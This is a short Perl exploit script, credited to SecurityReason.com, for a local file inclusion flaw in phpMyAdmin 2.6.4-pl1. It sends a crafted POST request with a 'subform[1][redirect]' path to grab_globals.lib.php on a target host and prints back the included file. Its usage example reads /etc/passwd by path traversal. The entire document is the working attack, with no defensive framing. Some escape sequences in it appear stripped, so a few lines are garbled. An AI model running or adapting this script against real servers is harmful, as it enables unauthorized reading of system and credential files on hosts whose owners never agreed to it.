#!/usr/bin/perl
use IO::Socket;

# SecurityReason.com TEAM
# Maksymilian Arciemowicz ( cXIb8O3 ) cxib@securtiyreason.com
#
# Local file inclusion (./$FILE)
# simple exploit phpMyAdmin 2.6.4-pl1
#
#
# SecurityReason.com

if (@ARGV < 3)
{
print "rn SecurityReason TEAMrn";
print "[cXIb8O3] EXPLOIT for phpMyAdmin 2.6.4-pl1rn";
print " rn";
print "perl phpmyadmin-2.6.4-pl1.pl HOST /DIR/ FILErnrn";
print "HOST - Host where is phpmyadmin example: http://localhostrn";
print "DIR - Directory to PMA example: /phpMyAdmin-2.6.4-pl1/rn";
print "FILE - file to inclusion ../../../../../etc/passwdrnrn";
print "example cmd: perl phpmyadmin-2.6.4-pl1.pl http://localhost /phpMyAdmin-2.6.4-pl1/ ../../../../../etc/passwdrnrn";
exit();
}

$HOST = $ARGV[0];
$DIR = $ARGV[1]."libraries/grab_globals.lib.php";
$FILE = "usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".$ARGV[2]."&subform[1][cXIb8O3]=1";
$LENGTH = length $FILE;

print "rnATTACK HOST IS: ".$HOST."rnrn";
$HOST =~ s/(http://)//;

$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "Error 404rnrn";

print $get1 "POST ".$DIR." HTTP/1.0n";
print $get1 "Host: ".$HOST."n";
print $get1 "Content-Type: application/x-www-form-urlencodedn";
print $get1 "Content-Length: ".$LENGTH."nn";

print $get1 $FILE;

while ($odp = <$get1>)
{
if ($odp =~ /Warning: main(): Unable to access ./$ARGV[2] in / ) {
printf "nnFile ".$ARGV[2]." no exists.rnrn";
exit;
}

printf $odp;
}